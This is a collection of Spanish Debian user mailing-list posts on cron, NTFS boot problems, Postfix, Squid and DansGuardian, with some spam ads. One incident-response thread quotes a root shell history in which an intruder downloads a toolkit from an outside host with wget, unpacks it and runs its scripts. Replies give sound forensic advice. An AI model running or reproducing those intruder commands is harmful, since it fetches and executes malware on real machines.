Re: Posible intrusión un server
El 13/06/11 05:36, Juan Lavieri escribió: Hola Juan Antonio. El 12/06/11 14:27, Juan Antonio escribió: El 13/05/11 17:39, ciracusa escribió: Lista, buenas tardes. Perdón si este tema no esta directamente relacionado con Debian, pero como el server en cuestión tiene Squeeze y es un tema de seguridad creo que puede interesarles a mas de uno. Ayer viendo el history de root de un servidor veo lo siguiente: ^ | | | Tocayo, parece que no leíste lo que dice arriba. Si es un history de root pareciera obvio que los comandos fueron emitidos por el usuario root. 314 ./go.sh 189 315 w 316 cd 317 cd /var/tmp/ 318 rm -rf gosh 319 ls -a 320 exit 321 cat /proc/cpuinfo 322 passwd 323 cd /var/tmp/ 324 cd gosh 325 touch bios.txt 326 chmod +x * 327 screen 328 exit 329 cat /proc/cpuinfo 330 cd /var/tmp/ 331 ls -a 332 wget http://gblteam.webs.com/gosh.tgz.tar 333 tar zxvf gosh.tgz.tar 334 rm -rf gosh.tgz.tar 335 cd gosh 336 touch bios.txt 337 chmod +x * 338 ./go.sh 200 339 cd 340 cd /var/tmp/ 341 ls -a 342 rm -rf gosh 343 ls -a 344 exit 345 cd /var/tmp/ 346 perl x.pl Que opinan? Entiendo -lamentablemente- que el server fue comprometido, pero lo que no llego a comprender es el alcance de esto. Notar que puse el link para que puedan descargarlo uds. también y analizarlo (tomando las precauciones del caso). Bueno, si alguien tiene algo de info muy agradecido. Y si pueden recomendarme algunos pasos para analizar la seguridad del server desde ya muchas gracias. Salu2. El tipo trabaja en /var/tmp asi que probablemente sea porque no tiene acceso como superusuario. Tal vez trabajó en var temp porque **NO ES** el primer sitio donde alguien comenzara a buscar; esto le dará tiempo para esconderse. Haz un ls -l del archivo que subió y mira el propietario, asi sabras que usuario es el que tienes comprometido. Y como te han dicho revisa los log del sistema para ver como lo hicieron. Por otra parte, te recomiendan que reinstales sin saber si quiera el alcance de la intrusión, yo no lo haría hasta estar seguro que te la hayan metido hasta el fondo. Tu opinión es acertada, hay que averiguar hasta dónde llegaron; pero creo haber leído varias respuestas que le recomiendan hacer una imagen del sistema **para efectos forenses** y luego reinstalar. Ciertamente ese es el enfoque correcto, hacer inoperante el servidor comprometido (para el atacante) y luego **con tiempo** averiguar qué pasó y cómo hacer para que no se repita. Usa ps, lsof, netstat y demas para ver si hay procesos anómalos ejecutándose y si no tienes tripwire usa lsattr para buscar atributos que no deberían tener binarios del sistema como ps, lsof, netstat, etc... suelen dejarlos como inmutables para que no puedas sustituirlos. Positivamente son herramientas excelentes; además se debe recordar que si se deja el servidor activo, como tu sugieres, debe estar aislado de la red interna y se deben resguardar los procesos vitales para la organización. Un saludo. (+1) = 2 Tienes razón, se me escapó ese detalle. En este caso el alcance esta claro y las opciones limitadas a una, reinstalar el sistema. Un saludo. -- To UNSUBSCRIBE, email to debian-user-spanish-requ...@lists.debian.org with a subject of unsubscribe. Trouble? Contact listmas...@lists.debian.org Archive: http://lists.debian.org/4df5a59c.5090...@limbo.ari.es
Re: Script desde cron usa tput para colorear la salida sin exito
El Sun, 12 Jun 2011 17:50:13 +0200, Usuario Debian escribió: Tengo un script donde hago uso de las variables: BLACK=`tput setf 0` BLUE=`tput setf 1` GREEN=`tput setf 2` CYAN=`tput setf 3` RED=`tput setf 4` MAGENTA=`tput setf 5` YELLOW=`tput setf 6` WHITE=`tput setf 7` PAra que en la salida hacia un fichero de log me lo coloree, si ejecuto el script a mano la salida es coloreada, pero si planifico la tarea con el dios CRON no es colereada el log ¿esto se debe a que desde cron el comando tput no tiene efecto? ¿que debo de hacer entonces? ¿Qué te dice el registro? ¿Algún error en la ejecución? Los errores de tipo el script funciona cuando lo ejecuto yo pero no cuando lo hace cron suelen deberse a un problema con las variables de entorno, mira a ver si poniendo la ruta completa (/usr/bin/tput) o definiendo la variable $PATH funciona. Saludos, -- Camaleón -- To UNSUBSCRIBE, email to debian-user-spanish-requ...@lists.debian.org with a subject of unsubscribe. Trouble? Contact listmas...@lists.debian.org Archive: http://lists.debian.org/pan.2011.06.13.11.02...@gmail.com
Re: Script desde cron usa tput para colorear la salida sin exito
El 13/06/11 13:02, Camaleón escribió: El Sun, 12 Jun 2011 17:50:13 +0200, Usuario Debian escribió: Tengo un script donde hago uso de las variables: BLACK=`tput setf 0` BLUE=`tput setf 1` GREEN=`tput setf 2` CYAN=`tput setf 3` RED=`tput setf 4` MAGENTA=`tput setf 5` YELLOW=`tput setf 6` WHITE=`tput setf 7` PAra que en la salida hacia un fichero de log me lo coloree, si ejecuto el script a mano la salida es coloreada, pero si planifico la tarea con el dios CRON no es colereada el log ¿esto se debe a que desde cron el comando tput no tiene efecto? ¿que debo de hacer entonces? ¿Qué te dice el registro? ¿Algún error en la ejecución? Los errores de tipo el script funciona cuando lo ejecuto yo pero no cuando lo hace cron suelen deberse a un problema con las variables de entorno, mira a ver si poniendo la ruta completa (/usr/bin/tput) o definiendo la variable $PATH funciona. Saludos, si lo he entendido bien, si lo escribes a la terminal lo colorea, y si lo envias a un archivo no, cosa muy razonable porque tput trabaja con las capacidades del terminal, es decir, los colores no estan en la metainformación de la salida que escribes al archivo de modo que si vuelcas el contenido del mismo lo colorea, si no que modifica las capacidades del terminal y colorea lo que se escribe en ésta. No se si me he explicado bien, ni siquiera se si yo he entendido bien el problema que plantea. De todos modos lo envío por sirve de algo. Un saludo. -- To UNSUBSCRIBE, email to debian-user-spanish-requ...@lists.debian.org with a subject of unsubscribe. Trouble? Contact listmas...@lists.debian.org Archive: http://lists.debian.org/4df5efba.7040...@limbo.ari.es
Re: Relay de un Dominio a una direcci'on de Correo
El Sun, 12 Jun 2011 16:05:54 -0400, gilbe escribió: (...) Hoy el transport para mis 14 subdominios esta asi. subX.midominio.cu smtp:192.168.0.1 Quisiera que este correo en vez de enviarlo por smtp a su ip que ya no esta accesible lo haga a una cuenta en mi dominio x...@midominio.com a la cual ellos acceden por modem. No me hagas mucho caso, pero me parece que necesitas una redirección de los correos (forwarding) y según el tipo de usuarios que sean (virtuales locales) tendrás que modificar un archivo un otro (revisa la página del manual VIRTUAL_README): http://www.postfix.org/VIRTUAL_README.html#forwarding Saludos, -- Camaleón -- To UNSUBSCRIBE, email to debian-user-spanish-requ...@lists.debian.org with a subject of unsubscribe. Trouble? Contact listmas...@lists.debian.org Archive: http://lists.debian.org/pan.2011.06.13.11.14...@gmail.com
Re: Escribir partición ntfs daña arranque de Windows 7
El día 13 de junio de 2011 00:52, Juan Lavieri jlavi...@gmail.com escribió: Hola Javier El 12/06/11 20:06, JAP escribió: Estimados: La presente es una curiosidad, pero la comento, pues no he encontrado nada parecido en la red. En algún lugar que no recuerdo me parece haber leído que las particiones de w7 no son exactamente del mismo formato ntfs de wXP. Mientras trato de navegar un poco a ver si te puedo ayudar, pregunto: Tengo (tenía, hasta hace un par de semanas) un equipo con dos discos, uno con Windows XP con formato ntfs y el segundo disco con GNU/Linux. El primero es para jugar, se entiende. Ambos arrancaban sin inconveniente con grub2. ii ntfs-3g 1:2011.1.15-0.1 read-write NTFS driver for FUSE Hace un par de semanas, ante los estropicios cometidos sobre el disco con XP, le di nuevo formato e instalé Windows 7. Todo bien, hasta que un día dejó de arrancar, apareciendo apenas una pantalla negra con un guión titilando arriba a la izquierda. Vuelta a dar formato, vuelta a instalar. El mismo día, todo bien, hasta que otra vez pasó lo mismo. Pensando en qué había hecho, me acordé que escribí desde Linux al disco ntfs; algo que con XP hice a menudo sin inconvenientes. Presumiendo un problema del sector de arranque del W7, lo que hice fue entrar con el disco de recuperación y reconstruir el mismo. Recuperé nuevamente el sistema, e hice la prueba. Conclusión: si escribo desde ¿A qué te refieres con: si esribo desde? Entiendo que si (p.e): Copias una foto de tu /home a la partición ntfs. Creas un archivo de texto con una a como contenido en tu partición ntfs. Imprimes hacia un archivo en la partición ntfs. En todos esos casos se destruye el MBR. ¿estoy en lo correcto? Sí, exactamente eso es lo que pasa. Linux amd64-debian 2.6.32-5-amd64 #1 SMP Mon Mar 7 21:35:22 UTC 2011 x86_64 GNU/Linux a la partición ntfs /dev/sda2: UUID=E6483F34483F02BB TYPE=ntfs el sector de arranque de W7 se pierde. Por ahora, simplemente saqué el montaje automático de fstab, UUID=E6483F34483F02BB /media/ntfs ntfs-3g force,r,users,auto,utf8,umask=0 0 0 y uso un pendrive para pasar datos de un sistema a otro. Sugerencia (sin saber lo que está pasando): ¿Tienes espacio para crear una partición FAT32 que puedas usar como puente? Eso puede ayudarte. Tal vez haga eso. Como comenté, en vez de una partición, por ahora estoy usando un pendrive que anda dando vueltas en la máquina. La realidad, que lo que suelo escribir en la partición ntfs no es más que alguna tontera, normalmente alguna cosa nueva que veo en Windows que la bajo para, cuando sobra algo de tiempo, probarla. El 99% del tiempo estoy con Debian ;-) Lo que pasó, es curioso, pero no me cambia la vida; si alguien sabe de algo, se agradece alguna pista de por qué sucede. JAP Saludos y éxito. Juan Lavieri JAP -- To UNSUBSCRIBE, email to debian-user-spanish-requ...@lists.debian.org with a subject of unsubscribe. Trouble? Contact listmas...@lists.debian.org Archive: http://lists.debian.org/BANLkTi=z44KY0k=wftx44ukvmss3eyv...@mail.gmail.com
Re: Escribir partición ntfs daña arranque de Windows 7
El Sun, 12 Jun 2011 21:36:38 -0300, JAP escribió: (...) Conclusión: si escribo desde Linux amd64-debian 2.6.32-5-amd64 #1 SMP Mon Mar 7 21:35:22 UTC 2011 x86_64 GNU/Linux a la partición ntfs /dev/sda2: UUID=E6483F34483F02BB TYPE=ntfs el sector de arranque de W7 se pierde. Por ahora, simplemente saqué el montaje automático de fstab, UUID=E6483F34483F02BB /media/ntfsntfs-3g force,r,users,auto,utf8,umask=000 y uso un pendrive para pasar datos de un sistema a otro. Lo que pasó, es curioso, pero no me cambia la vida; si alguien sabe de algo, se agradece alguna pista de por qué sucede. Puedes hacer una sencilla prueba: crea una partición en windows que sólo contenga datos y comparte sólo esa partición en linux, a ver qué pasa. O cambiar las opciones de montaje (ese force me suena a que era un poco agresivo). No sería la primera vez que veo un windows que no arranca porque tiene algún archivo de inicio corrupto y los archivos se pueden llegar a corromper sencillamente tras un mal apagado o tras una mala desmontada. Saludos, -- Camaleón -- To UNSUBSCRIBE, email to debian-user-spanish-requ...@lists.debian.org with a subject of unsubscribe. Trouble? Contact listmas...@lists.debian.org Archive: http://lists.debian.org/pan.2011.06.13.11.40...@gmail.com
Re: Script desde cron usa tput para colorear la salida sin exito
On Domingo, 12 de Junio de 2011 17:50:13 Usuario Debian escribió: Tengo un script donde hago uso de las variables: BLACK=`tput setf 0` BLUE=`tput setf 1` GREEN=`tput setf 2` CYAN=`tput setf 3` RED=`tput setf 4` MAGENTA=`tput setf 5` YELLOW=`tput setf 6` WHITE=`tput setf 7` PAra que en la salida hacia un fichero de log me lo coloree, si ejecuto el script a mano la salida es coloreada, pero si planifico la tarea con el dios CRON no es colereada el log ¿esto se debe a que desde cron el comando tput no tiene efecto? ¿que debo de hacer entonces? Prueba con ccze cat /var/log/syslog | ccze -A man ccze Un saludo BasaBuru -- To UNSUBSCRIBE, email to debian-user-spanish-requ...@lists.debian.org with a subject of unsubscribe. Trouble? Contact listmas...@lists.debian.org Archive: http://lists.debian.org/201106131412.32704.basab...@basatu.org
Cursos de Oratoria, tecnicas de locucion e Imagen personal
¿Queres mejorar tu dicción u oratoria? Cursos de Oratoria, técnicas de locución e Imagen Personal para aquellos que deseen ingresar a la carrera, estudiantes y personas que deseen mejorar su dicción y elocución pública. Para todo tipo de persona, estudiantes, gerentes, personal de relaciones publicas, de marketing, vendedores, de atencion al cliente, personal de call center, instructores, recepcionistas, docentes y oradores públicos. Por eso, hemos diseñado un plan de estudios de Oratoria, técnicas de locución e Imagen Personal , que abarca no solo la utilización de la voz y el aprendizaje de formación de la voz, sino también brinda herramientas útiles y necesarias, como la foniatría y el periodismo, conceptos sumamente necesarios para poder desempeñarse en todo Medio de Comunicación. Nuestro objetivo es que puedan descubrir sus capacidades y en poco tiempo, estén preparados para afrontar cualquier examen de ingreso a los institutos que brindan la Carrera Oficial, como así también a aquellos que desean perfeccionar sus condiciones actuales, o desempeñarse en diferentes tareas. Nuestras clases, de grupos reducidos, son dictadas por profesionales de los medios de Comunicación Nacionales más importantes del país. Conceptos y Contenidos que incorporarán: Oratoria moderna con todas sus expresiones, locuciones comerciales y artísticas, interpretación, modulación, dicción y colocación de la voz, conducción y capacitación corporativa. Expresión corporal, ejercicios de relajación, animaciones, conducción de programas de distintos formatos, vencer miedos escénicos y oratorios y mucho mas. Inscripción ABIERTA - La Duración es de 3 meses, con 1 clase semanal de 2 horas y media, los días martes, jueves, sábado o día a convenir en clases individuales o grupales, en empresas o en el estudio donde se dictan las mismas. Lugar: Capital Federal. Si estás interesado, te recomendamos reservar tu lugar con anticipación ya que nuestros grupos son limitados, un máximo de 10 alumnos, para garantizar un mejor aprendizaje. Para mas información, por favor, conteste este mail y le sera enviada toda la información junto con los aranceles. Cordialmente M. Isabel Sánchez Asesora Comercial GRABA-TEL SA TEL: 54-11-3220-1464 Si no desea recibir más nuestros boletines por favor reenvíe con asunto remover. Gracias -- To UNSUBSCRIBE, email to debian-user-spanish-requ...@lists.debian.org with a subject of unsubscribe. Trouble? Contact listmas...@lists.debian.org Archive: http://lists.debian.org/20110613093126.cfcc80022d38c...@terra.com
Cursos de Oratoria, tecnicas de locucion e Imagen personal
¿Queres mejorar tu dicción u oratoria? Cursos de Oratoria, técnicas de locución e Imagen Personal para aquellos que deseen ingresar a la carrera, estudiantes y personas que deseen mejorar su dicción y elocución pública. Para todo tipo de persona, estudiantes, gerentes, personal de relaciones publicas, de marketing, vendedores, de atencion al cliente, personal de call center, instructores, recepcionistas, docentes y oradores públicos. Por eso, hemos diseñado un plan de estudios de Oratoria, técnicas de locución e Imagen Personal , que abarca no solo la utilización de la voz y el aprendizaje de formación de la voz, sino también brinda herramientas útiles y necesarias, como la foniatría y el periodismo, conceptos sumamente necesarios para poder desempeñarse en todo Medio de Comunicación. Nuestro objetivo es que puedan descubrir sus capacidades y en poco tiempo, estén preparados para afrontar cualquier examen de ingreso a los institutos que brindan la Carrera Oficial, como así también a aquellos que desean perfeccionar sus condiciones actuales, o desempeñarse en diferentes tareas. Nuestras clases, de grupos reducidos, son dictadas por profesionales de los medios de Comunicación Nacionales más importantes del país. Conceptos y Contenidos que incorporarán: Oratoria moderna con todas sus expresiones, locuciones comerciales y artísticas, interpretación, modulación, dicción y colocación de la voz, conducción y capacitación corporativa. Expresión corporal, ejercicios de relajación, animaciones, conducción de programas de distintos formatos, vencer miedos escénicos y oratorios y mucho mas. Inscripción ABIERTA - La Duración es de 3 meses, con 1 clase semanal de 2 horas y media, los días martes, jueves, sábado o día a convenir en clases individuales o grupales, en empresas o en el estudio donde se dictan las mismas. Lugar: Capital Federal. Si estás interesado, te recomendamos reservar tu lugar con anticipación ya que nuestros grupos son limitados, un máximo de 10 alumnos, para garantizar un mejor aprendizaje. Para mas información, por favor, conteste este mail y le sera enviada toda la información junto con los aranceles. Cordialmente M. Isabel Sánchez Asesora Comercial GRABA-TEL SA TEL: 54-11-3220-1464 Si no desea recibir más nuestros boletines por favor reenvíe con asunto remover. Gracias -- To UNSUBSCRIBE, email to debian-user-spanish-requ...@lists.debian.org with a subject of unsubscribe. Trouble? Contact listmas...@lists.debian.org Archive: http://lists.debian.org/20110613093126.2e17adc67...@terra.com
Re: Relay de un Dominio a una direcci'on de Correo
On Sunday 12 June 2011 09:44:14 pm jose alfredo wrote: tengan un buen dia mis estimados usuarios, soy miembro de una organizacion estudiantil, y se me fuera bastante mas facil contactarlos por medio de mensajes a sus respectivos celulares, por casualidad algunos de ustedes sabra algun paquete que me permita hacer este tipo de operaciones, de ante mano muchas gracias, la unica informacion al repecto fue: http://www.uptodown.com/buscar/programa-masivo-para-mandar-mensajes-masivos -a-celulares obvio que es privativo, existira un analogo para debian? usa mjoy.com + firefox + pluggin user agent switcher -- Salu2 Ulinx Administrador de redes Ministerio de Finanzas y Precios Linux user 366775 En un problema con n ecuaciones siempre habrá al menos n+1 incógnitas. -- To UNSUBSCRIBE, email to debian-user-spanish-requ...@lists.debian.org with a subject of unsubscribe. Trouble? Contact listmas...@lists.debian.org Archive: http://lists.debian.org/201106130904.14363.uli...@mfp.gov.cu
Re: Samba PDC y BDC
El 12 de junio de 2011 11:25, Usuario Debian i32lelor.deb...@gmail.comescribió: El jue, 12-05-2011 a las 19:23 +, Edwin Quijada escribió: presa se autentifique contra este pero mi conexion entre ambos punntos es un poco lento por lo que no quiero sobrecargar el enlace comunicando la sucursal con el PDC por el asunto de los perfiles ademas de la carpeta que tiene cada useuario en el servidor. Y no seria mejor hacer uso de un LDAP MAster,, y las replicas de este en las sucursales, y cada samba lo asocias al LDAP... -- To UNSUBSCRIBE, email to debian-user-spanish-requ...@lists.debian.org with a subject of unsubscribe. Trouble? Contact listmas...@lists.debian.org Archive: http://lists.debian.org/1307894143.2161.3.camel@pcchatarra Saludos. Con samba bien configurado puedes hacer lo que necesitas, solo mira este videotutorial http://www.youtube.com/watch?v=L_h3Txzpej0feature=related -- Orlando E. Nuñez A. TSU en Informática Direccion Electronica: onvi...@gmail.com Telefono: 04263609858
Re: Posible intrusión un server
Saludos: Por otra parte, te recomiendan que reinstales sin saber si quiera el alcance de la intrusión, yo no lo haría hasta estar seguro que te la hayan metido hasta el fondo. Usa ps, lsof, netstat y demas para ver si hay procesos anómalos ejecutándose y si no tienes tripwire usa lsattr para buscar atributos que no deberían tener binarios del sistema como ps, lsof, netstat, etc... suelen dejarlos como inmutables para que no puedas sustituirlos. Creo que no se leyó o entendió bien esta recomendación, en primera instancia es realizar un forense de computadoras sobre el servidor o computadora comprometida para conocer el que, como, cuando, quien, etc, del incidente. Luego de lo cual se recomienda reinstalar todo el sistema, basando en los hallazgos de análisis forense; es obvio que de nada serviria reinstalar todo, y que el sistema quede en el estado cuando fue comprometido. Por otra parte, y es bueno recordarlo, la captura de evidencia se realizada con herramienta confiables, NO con las herramientas que estan en el sistema donde se suscitó el incidente. Atte: -- Alonso Eduardo Caballero Quezada aka ReYDeS - rey...@gmail.com OWASP Member / Brainbench Certified Computer Forensics (US) / SSP-CNSA www.iDev.pe / www.ReYDeS.com / www.npros.com.pe / LRU #307242 -- To UNSUBSCRIBE, email to debian-user-spanish-requ...@lists.debian.org with a subject of unsubscribe. Trouble? Contact listmas...@lists.debian.org Archive: http://lists.debian.org/BANLkTimVOV=uAZu4qo40T3ok-«izx...@mail.gmail.com
Creaciones de sitios web / publicidad
Le ofrecemos todas las variantes en servicios orientados a la web: Diseño de páginas web. Desarrollo de páginas web. Sistemas web a medida. Posicionamiento web. Hosting. Registro de dominios. Tenemos planes de alojamiento que se ajustan a sus necesidades, y registro de dominios desde $US 15.00 al año. Contactenos: perucrea...@hotmail.com Movil: 991595759 Nextel: 981546568 / 154*6568 Dar de baja perucrea...@hotmail.com
balanceando squid
Hola, os cuento un poco el escenario. Tengo 2 sedes. Quiero implementar 2 máquinas con squid en cada una de ellas y un balanceador para los 4 squid. Entonces, tengo sedeA con el balanceador (en principio por hardware, pero puede que sea por software) y 2 proxy y sedeB con 2 proxy (el balanceador estará en la sedeA). Tanto los clientes de la sedeA como de la sedeB tendrán configurado el proxy.pac. La historia es que yo quiero que los proxy de la sedeA solo reciba las peticiones de los clientes de la sede A (en caso que estén ambos caidos, pues que mande las peticiones a los proxy de la sedeB) y lo mismo con los proxy de la sedeB, osea, que solo reciba las peticiones de los clientes de la sedeB. Esto es posible? osea, yo le puedo decir al balanceador que depende de donde venga la petición se vaya para un proxy u otro? (osea, para una sede u otra) Os parece bien el esquema que os he planteado? es que me parece un poco excesivo poner balanceadores en ambas sedes (digamos que tengo una sede central que es donde iria el balanceador). Que modificariais?
Re: balanceando squid
On Monday 13 June 2011 11:35:30 am Esteban Torres Rodríguez wrote: Esto es posible? osea, yo le puedo decir al balanceador que depende de donde venga la petición se vaya para un proxy u otro? (osea, para una sede u otra) Os parece bien el esquema que os he planteado? es que me parece un poco excesivo poner balanceadores en ambas sedes (digamos que tengo una sede central que es donde iria el balanceador). yo tu mejor haria un cluster con heartbeat y pusiera squid como servicio clusterizado y punto, y tal como quieres -- Salu2 Ulinx Administrador de redes Ministerio de Finanzas y Precios Linux user 366775 En un problema con n ecuaciones siempre habrá al menos n+1 incógnitas. -- To UNSUBSCRIBE, email to debian-user-spanish-requ...@lists.debian.org with a subject of unsubscribe. Trouble? Contact listmas...@lists.debian.org Archive: http://lists.debian.org/201106131152.22811.uli...@mfp.gov.cu
Re: Posible intrusión un server
El 13/06/11 15:44, Alonso Caballero Quezada / ReYDeS escribió: Saludos: Por otra parte, te recomiendan que reinstales sin saber si quiera el alcance de la intrusión, yo no lo haría hasta estar seguro que te la hayan metido hasta el fondo. Usa ps, lsof, netstat y demas para ver si hay procesos anómalos ejecutándose y si no tienes tripwire usa lsattr para buscar atributos que no deberían tener binarios del sistema como ps, lsof, netstat, etc... suelen dejarlos como inmutables para que no puedas sustituirlos. Creo que no se leyó o entendió bien esta recomendación, en primera instancia es realizar un forense de computadoras sobre el servidor o computadora comprometida para conocer el que, como, cuando, quien, etc, del incidente. Luego de lo cual se recomienda reinstalar todo el sistema, basando en los hallazgos de análisis forense; es obvio que de nada serviria reinstalar todo, y que el sistema quede en el estado cuando fue comprometido. Por otra parte, y es bueno recordarlo, la captura de evidencia se realizada con herramienta confiables, NO con las herramientas que estan en el sistema donde se suscitó el incidente. Atte: En realidad no se como lo hice pero dejé de entender buena parte del correo. Sugerí que buscara la forma de ver que usuario había sido el causante de la intrusión cuando él ya estaba pegando la salida del history de root. Lamento el malentendido. Un saludo. -- Tanto en los deportes como en todo lo demás, soy un experto. Pero para mantener viva mi inteligencia natural y fuera de serie, tengo que comer mucho -- To UNSUBSCRIBE, email to debian-user-spanish-requ...@lists.debian.org with a subject of unsubscribe. Trouble? Contact listmas...@lists.debian.org Archive: http://lists.debian.org/4df63611.8050...@limbo.ari.es
Re: Escribir partición ntfs daña arranque de Windows 7
El 13 de junio de 2011 06:40, Camaleón noela...@gmail.com escribió: El Sun, 12 Jun 2011 21:36:38 -0300, JAP escribió: (...) Conclusión: si escribo desde Linux amd64-debian 2.6.32-5-amd64 #1 SMP Mon Mar 7 21:35:22 UTC 2011 x86_64 GNU/Linux a la partición ntfs /dev/sda2: UUID=E6483F34483F02BB TYPE=ntfs el sector de arranque de W7 se pierde. Por ahora, simplemente saqué el montaje automático de fstab, UUID=E6483F34483F02BB /media/ntfs ntfs-3g force,r,users,auto,utf8,umask=0 0 0 y uso un pendrive para pasar datos de un sistema a otro. Lo que pasó, es curioso, pero no me cambia la vida; si alguien sabe de algo, se agradece alguna pista de por qué sucede. Puedes hacer una sencilla prueba: crea una partición en windows que sólo contenga datos y comparte sólo esa partición en linux, a ver qué pasa. O cambiar las opciones de montaje (ese force me suena a que era un poco agresivo). No sería la primera vez que veo un windows que no arranca porque tiene algún archivo de inicio corrupto y los archivos se pueden llegar a corromper sencillamente tras un mal apagado o tras una mala desmontada. Saludos, -- Camaleón A mi también me sucede pero no necesito escribir la partición para que suceda. Estos son los pasos que sigo: 1. Instalo Debian 2. Instalo Windows 7 3. Recupero el Grub y con ello la entrada de windows en el grub Inicio por windows y empieza a fallar el inicio, algunas veces no falla windows se reinicia como cuando se daña. Cabe señalar que desde que no recupere el grub, windows 7 sigue bien, también que me pasó con windows Xp, y también que no creo que sea culpa del orden de instalación. Mi máquina es un HP G60, esto no me sucedió en otro equipo al cual le puse arranque dual. Por ahí vi ese problema en un foro de ubuntu y parece que era problema de grub y según eso lo corrigieron, pero en debian sigue sucediendo. -- LARGA VIDA Y PODEROSA. Blog de Haldrik -- To UNSUBSCRIBE, email to debian-user-spanish-requ...@lists.debian.org with a subject of unsubscribe. Trouble? Contact listmas...@lists.debian.org Archive: http://lists.debian.org/BANLkTi=l1qqcehadggnmpr+x-xnq7be...@mail.gmail.com
Re: Escribir partición ntfs daña arranque de Windows 7
El día 13 de junio de 2011 16:59, Odair Augusto Trujillo Orozco hald...@gmail.com escribió: El 13 de junio de 2011 06:40, Camaleón noela...@gmail.com escribió: El Sun, 12 Jun 2011 21:36:38 -0300, JAP escribió: (...) Conclusión: si escribo desde Linux amd64-debian 2.6.32-5-amd64 #1 SMP Mon Mar 7 21:35:22 UTC 2011 x86_64 GNU/Linux a la partición ntfs /dev/sda2: UUID=E6483F34483F02BB TYPE=ntfs el sector de arranque de W7 se pierde. Por ahora, simplemente saqué el montaje automático de fstab, UUID=E6483F34483F02BB /media/ntfs ntfs-3g force,r,users,auto,utf8,umask=0 0 0 y uso un pendrive para pasar datos de un sistema a otro. Lo que pasó, es curioso, pero no me cambia la vida; si alguien sabe de algo, se agradece alguna pista de por qué sucede. Puedes hacer una sencilla prueba: crea una partición en windows que sólo contenga datos y comparte sólo esa partición en linux, a ver qué pasa. O cambiar las opciones de montaje (ese force me suena a que era un poco agresivo). No sería la primera vez que veo un windows que no arranca porque tiene algún archivo de inicio corrupto y los archivos se pueden llegar a corromper sencillamente tras un mal apagado o tras una mala desmontada. Saludos, -- Camaleón A mi también me sucede pero no necesito escribir la partición para que suceda. Estos son los pasos que sigo: 1. Instalo Debian 2. Instalo Windows 7 3. Recupero el Grub y con ello la entrada de windows en el grub Inicio por windows y empieza a fallar el inicio, algunas veces no falla windows se reinicia como cuando se daña. Cabe señalar que desde que no recupere el grub, windows 7 sigue bien, también que me pasó con windows Xp, y también que no creo que sea culpa del orden de instalación. Mi máquina es un HP G60, esto no me sucedió en otro equipo al cual le puse arranque dual. Por ahí vi ese problema en un foro de ubuntu y parece que era problema de grub y según eso lo corrigieron, pero en debian sigue sucediendo. -- LARGA VIDA Y PODEROSA. Blog de Haldrik Como dato ampliatorio, tengo otra máquina muy similar, con CASI idéntica instalación. La primer máquina, la del problema, es de uso familiar por lo que necesito que grub sea amplio. La segunda es de uso exclusivo mío, por lo que es mś geek en su funcionamiento. La diferencia es que el disco que tiene Win7 no está incluido en el grub, es decir, tengo que presionar F11 al arrancar para seleccionar el disco con el que quiero iniciar. En esta máquina, Win7 nunca se descompuso, a pesar de leer/escribir la partición ntfs en cuestión desde GNU/Linux, siendo la cadena de montaje del fstab exactamente la misma, incluido el force que a Camaleón no le gusta ;-). Por lo que estimo apuntalaría tu teoría de fallo en grub. JAP -- To UNSUBSCRIBE, email to debian-user-spanish-requ...@lists.debian.org with a subject of unsubscribe. Trouble? Contact listmas...@lists.debian.org Archive: http://lists.debian.org/banlktimpj+plniptr4+jhjaffxchnyi...@mail.gmail.com
dansguardian
Slds lista , tengo un dansguardian trabajando con squid y funciona bien , el unico detalle es que cuando agrego una ip para que el filtro no lo pase en exceptioniplist no lo toma , y en dansguardian.conf tengo que lo tome. algo asi exceptioniplist = '/etc/dansguardian/exceptioniplist' alguna idea? sldss -- rickygm http://gnuforever.homelinux.com -- To UNSUBSCRIBE, email to debian-user-spanish-requ...@lists.debian.org with a subject of unsubscribe. Trouble? Contact listmas...@lists.debian.org Archive: http://lists.debian.org/BANLkTi=LQdYmR5vb=vum2tiutcxkjri...@mail.gmail.com
Re: dansguardian
-- Forwarded message -- From: troxlinux xserverli...@gmail.com Date: 2011/6/13 Subject: dansguardian To: debian-user-spanish@lists.debian.org Slds lista , tengo un dansguardian trabajando con squid y funciona bien , el unico detalle es que cuando agrego una ip para que el filtro no lo pase en exceptioniplist no lo toma , y en dansguardian.conf tengo que lo tome. algo asi exceptioniplist = '/etc/dansguardian/exceptioniplist' alguna idea? sldss -- rickygm http://gnuforever.homelinux.com -- To UNSUBSCRIBE, email to debian-user-spanish-requ...@lists.debian.org with a subject of unsubscribe. Trouble? Contact listmas...@lists.debian.org Archive: http://lists.debian.org/BANLkTi=LQdYmR5vb=vum2tiutcxkjri...@mail.gmail.com Buenas noches rickygm! Que tal si nos haces un pastebin de tu dansguardian.conf completo? Quiza alli encontremos el problema. Saludos, -- 54|\|714G0 L0P3Z |)3|\|4Z15. *4|3|21 7U ( 0|)1G0, 4|3|21 7U M3|\|73.*
Firefox en debian basico
Hola lista. Tengo una pregunta sobre como levantar un navegador firefox en una instalación básica de debian, tengo instalado solo el sistema base, instale firefox y xserver-xorg y tengo dudas en que mas necesite, solo necesito levantar una instancia de firefox automaticamente cuando inicia linux, trate con: firefox --display=0.0 -new-tab http://www.debian.org alguna idea de que me falten y/o se pueda realizar??? Saludos
FW: Control remoto SONY Original para LCD TV - LCD HD Alta Definicion - LCD Bravia - LCD TV Monitor HD.
SONY LCD TV REMOTE COMMANDER RM-YA004 REMOTE Originally supplied with models: KLHW26, KLHW26/ST, KLHW26S, KLHW32, KLHW32/ST, KLHW32S, KLV32U100M, KLV40U100M, RMYA004 Control remoto SONY Original para LCD TV - LCD HD Alta Definicion - LCD Bravia - LCD TV Monitor HD. Este remplazo no es comercial, no se consigue en el mercado y no esiste la imitación. A precio Economico por solo 50.000 Pesitos. LH-W26 - 26 HD LCD DisplayKLH-W32 - 32 HD LCD Display.KLV-32U100M - BRAVIA® HDTV LCD Monitor (Tuner-less)KLV-40U100M - BRAVIA® HDTV LCD Monitor (Tuner-less) Jhon Prada 301-4545-397 3157268165 6625663 Cartagena / Bolívar
Re: Firefox en debian basico
